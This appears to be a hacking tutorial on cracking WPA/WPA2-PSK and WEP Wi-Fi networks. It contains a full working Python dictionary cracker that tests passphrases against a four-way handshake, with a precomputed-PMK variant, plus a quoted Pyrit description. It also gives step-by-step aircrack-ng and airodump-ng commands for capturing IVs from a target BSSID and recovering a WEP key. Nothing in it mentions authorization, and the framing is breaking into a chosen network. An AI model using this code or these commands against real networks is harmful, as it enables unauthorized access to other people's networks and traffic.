Hack Wireless WPA Network

This short tutorial walks you through cracking WPA/WPA2-based networks that use pre-shared keys (WPA-PSK / WPA2-PSK).

WPA/WPA2 supports many authentication types beyond pre-shared keys (for example 802.1X/EAP). aircrack-ng can currently only crack pre-shared keys, so make sure airodump-ng lists the target network with authentication type PSK before you start.

If you know how to crack a WEP-based network, you know that WEP cracking relies on statistical methods. WPA/WPA2-PSK cracking is different: it is a plain brute-force (in practice, dictionary) attack in which each candidate passphrase is tested against a captured four-way handshake. This is slow, because the pre-shared key can be anywhere from 8 to 63 characters long, so an exhaustive search of a strong passphrase would take far too much time; what actually gets cracked is a weak passphrase that appears in a wordlist.

UPDATE Oct 12 2008
A new project called Pyrit is currently under way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows one to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”
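The two passages above (the brute-force attack on the pre-shared key, and Pyrit pre-computing "part of the authentication phase") can be shown concretely. The following is an added example written for this page, not code from the tutorial, from aircrack-ng or from Pyrit: it derives the PMK from passphrase and SSID, derives the key-confirmation key from the four-way handshake, and checks candidate passphrases against the handshake's MIC. The handshake is constructed inside the script (the BSSID 0a:0b:0c:0d:0e:0f from the tutorial, a made-up client MAC, made-up nonces and a generic RSN IE); only the PMK test vector ("password" with SSID "IEEE") is a real IEEE 802.11i value.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the slow step. It depends only on the passphrase and the SSID,
    not on anything in the handshake, so it can be precomputed per SSID
    (the space-time tradeoff that Pyrit's databases implement)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label||0x00||data||i) blocks."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK; its first 16 bytes are the Key Confirmation Key (WPA and WPA2)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, wordlist, ap_mac, sta_mac, anonce, snonce, eapol, version=2):
    """Dictionary attack: test each candidate passphrase against the captured MIC."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)                 # expensive
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)  # cheap
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured_mic):
            return candidate
    return None


def crack_psk_precomputed(pmk_table, ap_mac, sta_mac, anonce, snonce, eapol, version=2):
    """Same attack with PMKs already computed for this SSID: only the cheap step remains."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate, pmk in pmk_table.items():
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured_mic):
            return candidate
    return None


def build_sample_handshake(passphrase: str, ssid: str = "IEEE"):
    """Constructed message 2 of a four-way handshake (hypothetical values, not a capture)."""
    ap_mac = bytes.fromhex("0a0b0c0d0e0f")   # the BSSID used in the tutorial
    sta_mac = bytes.fromhex("001122334455")  # made-up client MAC
    anonce = bytes(range(32))                # made-up nonces
    snonce = bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: version 2, pairwise, MIC present
            + b"\x00\x10"               # key length
            + b"\x00" * 7 + b"\x01"     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16              # MIC placeholder, filled in below
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol, 2) + eapol[MIC_OFFSET + 16:]
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac,
                anonce=anonce, snonce=snonce, eapol=eapol)


def demo():
    hs = build_sample_handshake("password")
    wordlist = ["letmein", "12345678", "password", "Password1"]
    return crack_psk(hs["ssid"], wordlist, hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"], hs["eapol"])


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

crack_psk redoes the 4096-iteration PBKDF2 for every candidate, which is the cost aircrack-ng pays per word. crack_psk_precomputed takes a table of PMKs already computed for that SSID, leaving one PRF and one HMAC per candidate; that is the part of the authentication phase Pyrit moves into a precomputed database, and also why such tables only help against the SSID they were built for.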


Hack Wireless WEP Network


WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. (Source: Wikipedia)

It’s fairly easy to crack a WEP-encrypted wireless network. In fact WEP’s design has serious flaws: every packet is RC4-encrypted under a key formed from a 24-bit IV and the shared secret, and a statistical attack over enough captured IVs recovers the secret. That is what makes it fast to crack.

Install aircrack-ng on Debian Etch with:

sudo apt-get install aircrack-ng

Then start airodump-ng (the capture tool of the aircrack-ng suite) to look for wireless networks. The interface (eth1 here) must be in monitor mode, otherwise you will not see raw 802.11 frames:

sudo airodump-ng eth1

Note the channel number and the BSSID of the wireless network you want to crack.

Quit airodump-ng and start it again locked to that channel, so it collects packets from the target faster, writing the capture to files with the prefix dump:

sudo airodump-ng -c 4 -w dump eth1

Then wait until it has collected about 500K IVs (the #Data column in airodump-ng) and try the actual crack. Newer aircrack-ng versions use the PTW attack and usually succeed with far fewer IVs:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target, and dump-01.cap is the file containing the captured packets (airodump-ng appends -01 to the prefix given with -w). If aircrack-ng fails, it simply needs more IVs: keep capturing and run it again.

